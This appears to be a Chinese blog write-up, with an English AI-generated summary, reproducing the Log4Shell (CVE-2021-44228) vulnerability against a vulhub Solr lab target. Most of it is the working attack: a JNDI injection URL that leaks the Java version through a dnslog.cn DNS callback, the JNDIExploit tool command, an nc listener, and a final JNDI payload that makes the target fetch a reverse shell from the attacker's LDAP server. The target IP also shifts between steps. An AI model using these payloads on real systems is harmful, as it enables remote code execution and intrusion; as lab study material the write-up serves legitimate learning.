Log4J反序列化

Feb 13, 2024#Web2Security15

AI-generated summary

The summary of the given text is as follows: The environment consists of a Kali system as the attacking machine, a CentOS machine as the intermediary, and a target machine. The target machine's IP is 192.168.1.4:8983, the local machine's IP is 192.168.1.2, and the attacking machine's IP is 192.168.91.131. The attack involves opening the target machine's environment and making a DNS request to a specific domain. By modifying the domain, the attacker gains access to the target machine and executes commands. The attacker then uses JNDIExploit-1.2 to input a command and opens a port listener on the attacking machine. Finally, the attacker constructs a command in the hackbar and executes it, resulting in a shell being returned to the attacker.

环境：
/root/CVE/vulhub-master/log4j/CVE-2021-44228
Kali 系统一个 —— 需 nc 来监听端口信息，作为攻击机
本机：中转机
centOS：靶机

地址信息：
靶机 IP：192.168.1.4:8983
本机 IP：192.168.1.2
攻击机：192.168.91.131

开启靶机环境

请求一个 DNS 域名
http://dnslog.cn/

域名：
gswq4u.dnslog.cn
打开 hackbar，先点一下 loadURL

将资料中提供的地址，复制

将后面的域名，改为刚刚申请的
gswq4u.dnslog.cn
http://192.168.1.4:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.f6pnnm.dnslog.cn}
点击执行，出现下面页面

这里获得了反馈

现在打开 JNDIExploit-1.2，
输入指令
java -jar .\JNDIExploit-1.2-SNAPSHOT.jar -i 本机 IP

然后在攻击机，打开端口监听
命令：
nc -lvp 4444

在 hackbar 构建如下命令、
http://192.168.91.132:8983/solr/admin/cores?action=${jndi:ldap://192.168.1.2:1389/Basic/ReverseShell/192.168.91.131/1234}
点击 Execute

发现监听的端口返回了 shell

到此复现完成